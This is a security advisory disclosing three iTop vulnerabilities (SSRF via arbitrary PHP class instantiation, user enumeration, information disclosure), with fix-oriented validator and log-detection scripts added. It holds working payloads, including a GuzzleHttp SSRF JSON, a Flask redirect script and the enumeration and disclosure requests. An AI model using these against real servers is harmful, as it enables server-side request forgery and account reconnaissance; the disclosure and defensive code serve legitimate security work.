Multiple vulnerabilities on iTop
31/01/2025
Product
iTop
Severity
Low
Fixed Version(s)
Affected Version(s)
< 2.7.11, < 3.0.5, < 3.1.2, < 3.2.0
CVE Number
CVE-2024-32870, CVE-2024-51739, CVE-2024-51740
Authors
Description
Presentation
iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.
Issue(s)
Multiple vulnerabilities have been identified in iTop, allowing an attacker to perform SSRF through arbitrary PHP class instantiation, to leak technical information and to perform user enumeration. The following advisories were released by iTop:
Timeline
| Date | Description |
|---|---|
| 2024.04.03 | Advisory sent to itop-security@combodo.com |
| 2024.04.12 | iTop acknowledges the vulnerabilities |
| 2024.11.04 | Advisories published by iTop |
| 2025.01.31 | Public release |
Technical details
SSRF through arbitrary PHP class instantiation
Description
When iTop receives a form from an authenticated user, several PHP class names (and namespaces) are sent through the HTTP request. In fact, a JSON-encoded payload is sent, containing information about the ticket in the formmanager_data POST parameter:
{
    "id":"objectform-ticket-create-660d204f10398",
    "transaction_id":"feur-UuIytV",
    "formmanager_class":"Combodo\\iTop\\Portal\\Form\\ObjectFormManager",
    "formrenderer_class":"Combodo\\iTop\\Renderer\\Bootstrap\\BsFormRenderer",
    "formrenderer_endpoint":"/pages/exec.php/object/create/UserRequest?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal",
    "formobject_class":"UserRequest"
}
By replacing the formrenderer_class parameter with Synacktiv, the following error is triggered:
HTTP/1.1 500 Internal Server Error
Content-Length: 277
Content-Type: application/json
{
"exception":null,
"code":500,
"error_title":"Oups ! Une erreur est survenue.",
"error_message":"Attempted to load class \u0022Synacktiv\u0022 from the global namespace.\nDid you forget a \u0022use\u0022 statement?"
}
This means we are able to instantiate any PHP class in the iTop application. Indeed, in the sources/Form/FormManager.php file, dangerous variable manipulation is performed:
<?php
[...]
// The class name is taken straight from the user-controlled JSON and
// instantiated without any allow-list check
$sFormRendererClass = $aJson['formrenderer_class'];
$oFormRenderer = new $sFormRendererClass();
// The user-controlled endpoint is then passed to whatever SetEndpoint()
// resolves to on that class, including a magic __call() handler
$oFormRenderer->SetEndpoint($aJson['formrenderer_endpoint']);
[...]
?>
This means we are able to instantiate any PHP class respecting one of the following rules:
- The magic __construct function is not declared.
- The magic __construct function is declared but does not take any argument.
- The magic __construct function is declared and takes positional parameters.
Several classes complying with these rules can be found. To be exploited, they also have to implement the SetEndpoint method or the magic __call method.
iTop uses GuzzleHttp, which allows performing HTTP requests. Therefore, if we send the following modified JSON in the formmanager_data POST parameter:
{
    "id":"objectform-ticket-create-660d204f10398",
    "transaction_id":"feur-UuIytV",
    "formmanager_class":"Combodo\\iTop\\Portal\\Form\\ObjectFormManager",
    "formrenderer_class":"GuzzleHttp\\Client",
    "formrenderer_endpoint":"http://localhost:4444/"
}
We can observe that a SETENDPOINT HTTP request is received:
$ nc -lnvp 80
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43762
SETENDPOINT / HTTP/1.1
Host: localhost:80
User-Agent: GuzzleHttp/7
As the SETENDPOINT HTTP verb is not standard, we can create the following Python script to turn it into a valid HTTP query:
from flask import Flask, redirect

app = Flask(__name__)

# Accept the non-standard SETENDPOINT verb that Guzzle's __call() turns
# into the request method
@app.route('/', methods=['SETENDPOINT'])
def index():
    # The 302 redirect makes Guzzle follow up with a plain GET
    return redirect('http://localhost:8080')

app.run(host='0.0.0.0', port=80)
An HTTP GET request is then received on port 8080:
$ nc -lnvp 8080
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 46176
GET / HTTP/1.1
Host: localhost:8080
User-Agent: GuzzleHttp/7
Impact
This vulnerability can be used to create HTTP requests on behalf of the server, from a low privileged user.
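As an added illustration (not code from the advisory or from iTop), the following Python function expresses the check the vulnerable FormManager.php code lacks: the manager and renderer class names must come from a fixed allow-list and the endpoint must be a site-relative path, so a payload naming GuzzleHttp\Client, an unknown class, or an absolute URL is rejected before anything is instantiated. The allow-list contents are an assumption drawn from the two classes the advisory shows; a real deployment would enumerate its own. The same logic, written in PHP, is what would sit in front of `new $sFormRendererClass()`.

```python
import json
from urllib.parse import urlsplit

# Allow-lists of class names a portal form submission may legitimately carry.
# Constructed for this example from the two classes that appear in the advisory;
# a real deployment would list every manager/renderer class its portals use.
ALLOWED_MANAGER_CLASSES = {"Combodo\\iTop\\Portal\\Form\\ObjectFormManager"}
ALLOWED_RENDERER_CLASSES = {"Combodo\\iTop\\Renderer\\Bootstrap\\BsFormRenderer"}

# The benign payload from the advisory and the SSRF variant naming GuzzleHttp\Client,
# re-serialised here as sample input.
LEGIT_PAYLOAD = json.dumps({
    "id": "objectform-ticket-create-660d204f10398",
    "transaction_id": "feur-UuIytV",
    "formmanager_class": "Combodo\\iTop\\Portal\\Form\\ObjectFormManager",
    "formrenderer_class": "Combodo\\iTop\\Renderer\\Bootstrap\\BsFormRenderer",
    "formrenderer_endpoint": "/pages/exec.php/object/create/UserRequest"
                             "?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal",
    "formobject_class": "UserRequest",
})
SSRF_PAYLOAD = json.dumps({
    "id": "objectform-ticket-create-660d204f10398",
    "transaction_id": "feur-UuIytV",
    "formmanager_class": "Combodo\\iTop\\Portal\\Form\\ObjectFormManager",
    "formrenderer_class": "GuzzleHttp\\Client",
    "formrenderer_endpoint": "http://localhost:4444/",
})


def check(raw):
    """Return (True, "ok") when formmanager_data only names allow-listed classes
    and a site-relative endpoint, otherwise (False, reason).

    Each test mirrors a check that belongs in front of `new $sFormRendererClass()`:
    the class must come from a fixed set, never from the request, and the
    endpoint must be a local path rather than a URL a client such as Guzzle
    could be pointed at.
    """
    try:
        data = json.loads(raw)
    except ValueError as exc:
        return False, f"invalid JSON: {exc}"
    if not isinstance(data, dict):
        return False, "payload is not a JSON object"

    manager = data.get("formmanager_class")
    if manager not in ALLOWED_MANAGER_CLASSES:
        return False, f"unexpected formmanager_class: {manager!r}"

    renderer = data.get("formrenderer_class")
    if renderer not in ALLOWED_RENDERER_CLASSES:
        return False, f"unexpected formrenderer_class: {renderer!r}"

    endpoint = data.get("formrenderer_endpoint")
    if not isinstance(endpoint, str):
        return False, "formrenderer_endpoint missing"
    parts = urlsplit(endpoint)
    # Reject anything with a scheme or host, and protocol-relative "//host" forms
    if parts.scheme or parts.netloc or not endpoint.startswith("/") or endpoint.startswith("//"):
        return False, f"formrenderer_endpoint must be a site-relative path: {endpoint!r}"
    return True, "ok"


if __name__ == "__main__":
    for name, payload in (("legit", LEGIT_PAYLOAD), ("ssrf", SSRF_PAYLOAD)):
        print(name, check(payload))
```

The comparison is an exact string match on purpose: a stricter match can only reject more, and the legitimate client always sends the fully qualified names shown in the advisory, so there is no need to normalise leading backslashes or case.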
User enumeration
Description
From the webservices/rest.php file, several operations are accessible to an unauthenticated user. One of them is do_reset_pwd, allowing to reset a user password.
This feature can be abused to perform user enumeration. If we perform the following request with a non-existent user:
GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist HTTP/1.1
Host: itop.local
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Combodo-Ajax: true
X-Requested-With: XMLHttpRequest
Origin: http://itop.local
The server answers with the following sentence in the HTTP response:
<h1>Reset password</h1>
<p>
'doesnotexist' is not a valid login
</p>
Impact
This allows unauthenticated users to perform user enumeration, which can make it easier to bruteforce a valid account.
Information disclosure
Description
This vulnerability allows an unauthenticated user to leak information about the running environment of iTop.
By performing the following request:
GET /pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup HTTP/1.1
Host: itop.local
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Combodo-Ajax: true
X-Requested-With: XMLHttpRequest
Origin: http://itop.local
The server answers with an HTML page containing environment information in a JSON document:
{
    "instance_host":"http://itop.local/",
    "application_name":"iTop",
    "application_version":"3.1.1-1",
    "application_version_full":"iTop version 3.1.1-1-12561 built on 2023-12-19 10:53:23",
    "server_stack":{
        "os_name":"Linux",
        "web_server_name":"apache",
        "web_server_version":"Apache/2.4.56 (Debian)",
        "database_name":"MySQL",
        "database_version":"10.5.23-MariaDB-0+deb11u1",
        "database_settings":{
            "server":"100523",
            "client":"70433",
            "max_allowed_packet":"16777216"
        },
        "php_version":"7.4.33"
    }
}
Impact
An attacker can recover information about the remote environment.
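For defenders, both the user-enumeration and the information-disclosure issues leave a clear trace in the web server's access log, since each is a GET with a distinctive query string. The following Python script is an added example (not from the advisory or from iTop) that runs over a few constructed Apache combined-format lines: it flags a source address that issues do_reset_pwd requests for many distinct auth_user values within a short window, and any successful request to the itop-hub-connector launch.php page with target=inform_after_setup. The log lines, addresses, user names and the window/threshold values are constructed for the example; tune the threshold to your own password-reset volume.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines for this example; none of this is real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Jan/2025:10:00:01 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=alice HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.5 - - [31/Jan/2025:10:00:02 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=bob HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.5 - - [31/Jan/2025:10:00:02 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=carol HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.5 - - [31/Jan/2025:10:00:03 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=dave HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.5 - - [31/Jan/2025:10:00:04 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=erin HTTP/1.1" 200 412 "-" "python-requests/2.31"
203.0.113.5 - - [31/Jan/2025:10:00:05 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=frank HTTP/1.1" 200 412 "-" "python-requests/2.31"
198.51.100.7 - - [31/Jan/2025:10:02:10 +0000] "GET /webservices/rest.php?loginop=do_reset_pwd&auth_user=jdoe HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Jan/2025:10:02:30 +0000] "GET /pages/exec.php?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Jan/2025:10:03:00 +0000] "GET /pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup HTTP/1.1" 200 701 "-" "python-requests/2.31"
"""

# Apache "combined" format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None for unparseable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(m.group("target"))
    # Keep the first value of each query parameter
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"ip": m.group("ip"), "ts": ts, "path": parts.path,
            "query": query, "status": int(m.group("status"))}


def is_reset_pwd(ev):
    return ev["path"] == "/webservices/rest.php" and ev["query"].get("loginop") == "do_reset_pwd"


def is_hub_inform(ev):
    return (ev["path"] == "/pages/exec.php"
            and ev["query"].get("exec_module") == "itop-hub-connector"
            and ev["query"].get("target") == "inform_after_setup")


def enumeration_alerts(resets, window_seconds, threshold):
    """Map ip -> max number of distinct auth_user values seen in any window."""
    by_ip = defaultdict(list)
    for ts, ip, user in resets:
        by_ip[ip].append((ts, user))
    alerts = {}
    for ip, items in by_ip.items():
        items.sort()
        best, start = 0, 0
        for end in range(len(items)):
            # Slide the window start forward until it fits within window_seconds
            while (items[end][0] - items[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, len({u for _, u in items[start:end + 1]}))
        if best >= threshold:
            alerts[ip] = best
    return alerts


def analyze(log_text, window_seconds=60, threshold=5):
    """Return enumeration suspects and sources that fetched the hub connector page."""
    events = [ev for ev in map(parse_line, log_text.splitlines()) if ev]
    resets = [(ev["ts"], ev["ip"], ev["query"].get("auth_user", ""))
              for ev in events if is_reset_pwd(ev)]
    return {
        "enumeration": enumeration_alerts(resets, window_seconds, threshold),
        # A 200 means the environment JSON was actually served
        "info_disclosure": sorted({ev["ip"] for ev in events
                                   if is_hub_inform(ev) and ev["status"] == 200}),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Counting distinct auth_user values rather than raw request counts keeps a single user who retries a reset several times from tripping the alert, while a scan that walks a user list does.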